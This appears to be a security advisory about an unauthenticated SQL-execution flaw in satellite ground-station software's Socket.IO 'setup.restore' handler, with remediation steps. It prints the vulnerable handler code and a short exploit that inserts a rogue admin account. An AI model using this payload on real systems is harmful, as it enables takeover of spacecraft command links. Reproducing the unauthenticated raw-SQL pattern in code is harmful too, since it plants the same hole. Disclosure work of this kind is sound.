A critical authentication bypass and SQL injection vulnerability has been discovered in ground-station, the mission-critical telemetry, satellite pass tracking, and telecommand software platform deployed in satellite ground stations, CubeSat tracking networks, and aerospace operations centers. Cataloged under CVE-2026-103244 and published in GitHub Advisory GHSA-wwmv-hj9m-4mcc with a maximum CVSS v3.1 base score of 9.8 (Critical), the flaw enables unauthenticated remote attackers to execute arbitrary SQL queries, plant backdoor administrative credentials, and achieve complete system takeover via exposed Socket.IO event channels.

Satellite Ground Station Software Architecture

Modern satellite ground station terminals interface with rotator motors, Doppler-corrected software-defined radios (SDRs), and telemetry decoders to establish uplink/downlink communication during low Earth orbit (LEO) satellite passes. The ground-station application provides an operations dashboard that visualizes orbital tracking telemetry, controls azimuth/elevation antenna positioners, and logs received scientific payloads.

To support high-frequency telemetry visualization, the platform employs Socket.IO over WebSockets for bi-directional communication between the web frontend and the Node.js backend.

Vulnerability Mechanics: Unauthenticated Socket.IO setup.restore (CWE-89)

In versions prior to 0.8.0, the Socket.IO event router exposed administrative configuration primitives—specifically the setup.restore event handler—without enforcing session validation:

// Vulnerable Socket.IO Event Handler in ground-station (< 0.8.0)
socket.on("setup.restore", async (payload) => {
    // FATAL FLAW: Zero authentication or role verification check!
    // payload.sql is passed directly to the raw SQLite/PostgreSQL driver:
    try {
        await db.raw(payload.sql); // Direct Unsanitized SQL Execution!
        socket.emit("setup.restore.success", { status: "restored" });
    } catch (err) {
        socket.emit("setup.restore.error", { error: err.message });
    }
});

Because the handler was designed to restore database backups during initial deployment setup, it executed arbitrary SQL strings received from the client. Even on fully deployed production systems where initial setup had concluded, the Socket.IO listener remained active and accessible to anyone capable of initiating a WebSocket connection.

An attacker connects over WebSockets and transmits a setup.restore message containing an INSERT statement targeting the users table:

// Attacker Exploit Payload via Socket.IO
const io = require("socket.io-client");
const socket = io("http://groundstation.internal:3000");

socket.emit("setup.restore", {
    sql: "INSERT INTO users (id, username, password_hash, role) VALUES (999, 'hacked_admin', '$2b$12$...', 'admin');"
});

The backend executes the query immediately. With the new administrative account established, the adversary authenticates via the standard web login interface, gaining full operational control over satellite tracking dishes, telecommand transmitters, and telemetry logs.

Operational Impact Matrix

Subsystem Vulnerable State Mission Consequence
Antenna Rotator Control Attacker issues azimuth/elevation slewing commands Physical motor damage or misalignment causing lost satellite passes
Uplink Telecommand Attacker submits commands to radio transmitter queue Unauthorized commands transmitted directly to orbiting spacecraft
Telemetry Database Arbitrary SQL execution / data wiping Destruction of scientific telemetry and historical flight logs

Remediation & Defense Actions

  1. Upgrade Ground-Station to v0.8.0: Apply release 0.8.0 immediately. The update permanently removes raw SQL execution from the Socket.IO handler and enforces strict session authentication across all socket endpoints.
  2. Network Segmentation for Aerospace Terminals: Isolate ground station software controllers on an isolated operational VLAN. Block direct internet access to dashboard and Socket.IO ports (TCP 3000).
  3. Audit User Tables for Rogue Accounts: Query the database for unauthorized administrative users created during the exposure window.